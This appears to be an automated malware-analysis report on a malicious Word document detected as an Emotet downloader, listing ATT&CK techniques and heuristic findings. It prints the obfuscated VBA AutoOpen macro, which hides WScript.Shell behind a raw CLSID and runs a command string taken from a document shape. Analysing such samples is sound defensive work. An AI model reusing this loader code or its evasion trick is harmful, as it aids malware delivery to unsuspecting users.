MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The macros leverage the 'WScript.Shell' COM object and reference PowerShell, indicating an attempt to download and execute a second-stage payload. ClamAV detection confirms this as Emotet, a known downloader family.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6826434-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826434-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set wfArzbE = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + LZvlFiO + LwPWXZ + mTvTcDpC + XOhsCfQm)) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set wfArzbE = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + LZvlFiO + LwPWXZ + mTvTcDpC + XOhsCfQm)) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4994 bytes |
SHA-256: 3aecc998474c0efede0c6ada349c495f27df973fd912edc80ace101176923792 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
118 of 177 identifiers look randomly generated (e.g. 'GzmPjnLztYzSzd') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zTSBzVmTO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case LDKYGYMA
Case 15210334
AnrMi = CBool(jKzBhiof)
QKvOsl = 31001642
TKiJo = CBool(YXDjH)
Case 169345724
TomzwAdDB = CBool(OiIqOQlK)
vlYCAW = Atn(AbiiujFUw)
JPtkazS = CBool(QijTKHR)
odKvmmc = Atn(41897478 * CLng(340075060))
End Select
On Error Resume Next
Select Case qlCTXJ
Case 209767118
iHwJjtVz = CBool(MQzCLU)
zpQmZCHN = 220745380
NaOiwB = CBool(VQdNAIG)
Case 259333864
EUiwO = CBool(QRVistQj)
icXfvicPO = Atn(jvrYwjJ)
WwmjjziJz = CBool(OJcFji)
YkbrUbF = Atn(103972817 * CLng(149668441))
End Select
Set WnhZotr = Shapes("GzmPjnLztYzSzd")
On Error Resume Next
Select Case zisHkjdz
Case 322607801
KjBmUI = CBool(XRLnSnLXV)
tTlUm = 147074321
INhMPMjHL = CBool(fdAzZ)
Case 63086442
fsIAiqhj = CBool(jkiLvX)
HiGalI = Atn(ijHif)
UFTJwptOs = CBool(XAczjvc)
KHPsS = Atn(127825759 * CLng(227744357))
End Select
MZrkIZw = "" + IIYjDGY + dUXHBpua + OFizOB + cnzbsSG + WnhZotr.TextFrame.TextRange.Text + GPwnFG + lEdQd + HvNOuQQ
On Error Resume Next
Select Case KwpUvPi
Case 313941215
PBaZhj = CBool(iEmGrPw)
iFCpMLAzn = 148155252
uBnuQmhUD = CBool(npjYfE)
Case 113355953
ZiuzzlpN = CBool(jHPEnCnlV)
KWTKvvivP = Atn(QjGjRN)
zzBBEDtw = CBool(oHzmvn)
JGJGY = Atn(339431101 * CLng(17593061))
End Select
On Error Resume Next
Select Case LRwwvwWA
Case 203938198
DdRzn = CBool(oibJKQUwC)
FPiihcS = 185617685
iwiPh = CBool(PQJFqJYU)
Case 29853341
hYhUv = CBool(zvarGWwVa)
puFvGS = Atn(VvzLsMLju)
hzDlHIl = CBool(mpqjt)
nifTdP = Atn(58212323 * CLng(306903405))
End Select
Set wfArzbE = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + LZvlFiO + LwPWXZ + mTvTcDpC + XOhsCfQm))
On Error Resume Next
Select Case wXGPp
Case 22351217
hJCHFWAiT = CBool(CfjDWBBWT)
purRrb = 217827953
brSPZ = CBool(uowUfmRj)
Case 91639473
UXwAaWF = CBool(VmBnRlQip)
DcimFuIiD = Atn(qhzIjPzT)
jjFmZun = CBool(HWNDBwXd)
zhRCrsTX = Atn(18736161 * CLng(266015260))
End Select
On Error Resume Next
Select Case kDLzwD
Case 72791386
mECFXoRcj = CBool(FlTcN)
kECQoH = 230082505
PzwbQlC = CBool(pZjvMvAfo)
Case 332519350
zVVrHpz = CBool(sAuKiV)
pZspLuF = Atn(wtvSz)
DWcpijEu = CBool(olQWJ)
vPCZkFbnw = Atn(254451854 * CLng(202046398))
End Select
On Error Resume Next
Select Case dvGmMK
Case 49722810
vrGzzXTS = CBool(mrMvnRs)
jZKbpibbw = 156580783
mGBYUziL = CBool(srwpJjiEI)
Case 145631201
dOqflwHGN = CBool(WDzkjYk)
rvFGvE = Atn(bVRFAWTZ)
FYPWmYrc = CBool(RVowEdLtl)
akXTmq = Atn(66273601 * CLng(175771278))
End Select
On Error Resume Next
Select Case MKkYuW
Case 135113000
MbjmSMz = CBool(QWmzSAAZZ)
hwHIV = 54521677
nirjB = CBool(fSjSTJ)
Case 19317625
irpNWbGt = CBool(KLwqoW)
DFakfi = Atn(HPJHi)
hjQWWzGR = CBool(zjvtVjYCW)
wQOOiSBEj = Atn(223702445 * CLng(331503309))
End Select
Const FpQoohXLD = 0
On Error Resume Next
Select Case PvHwlaC
Case 297762154
MMNWzutSM = CBool(jUCSZG)
kQCEMJtb = 36379625
OkKMKarip = CBool(ECGmvt)
Case 266257311
INdir = CBool(pmrmz)
Uvtvi = Atn(BHWtLojr)
iKPISVlT = CBool(WjtJXYjEi)
vJJKIOsh = Atn(247638498 * CLng(95058472))
End Select
wfArzbE.Run MZrkIZw, FpQoohXLD
On Error Resume Next
Select Case NPtzzkT
Case 147055854
kLnUVjJ = CBool(mLSSXMhR)
kLCaOPB = 279841414
cvPnfSzC = CBool(tzRhbJX)
Case 9421521
qGqCLhXz = CBool(TuVvm)
nGNSzfz = Atn(VloSKD)
sDNbLjra = CBool(hPjKfHFz)
nuUvEC = Atn(56429717 * CLng(278369354))
End Select
On Error Resume Next
Select Case BGljK
Case 271389305
JitzAGwY = CBool(SSjPDiw)
MTiKafir = 65596981
tQXiIN = CBool(caWAiiuaR)
Case 334345398
muzTH = CBool(UqKci)
OFqmEHAnK = Atn(RaHchi)
kjJjiFPW = CBool(ISKSCUt)
IunspTQ = Atn(73263370 * CLng(275055725))
End Select
On Error Resume Next
Select Case AznEviB
Case 28315525
idVjFsiXL = CBool(PvBTBCjMq)
pQNvTarM = 2848141
CjothSmqr = CBool(iKwtvf)
Case 333266987
lCPSLVG = CBool(QZQfBV)
RpiGIlj = Atn(pVbEfU)
AobNaw = CBool(kVTmQCN)
LMInfEN = Atn(159319551 * CLng(276082480))
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.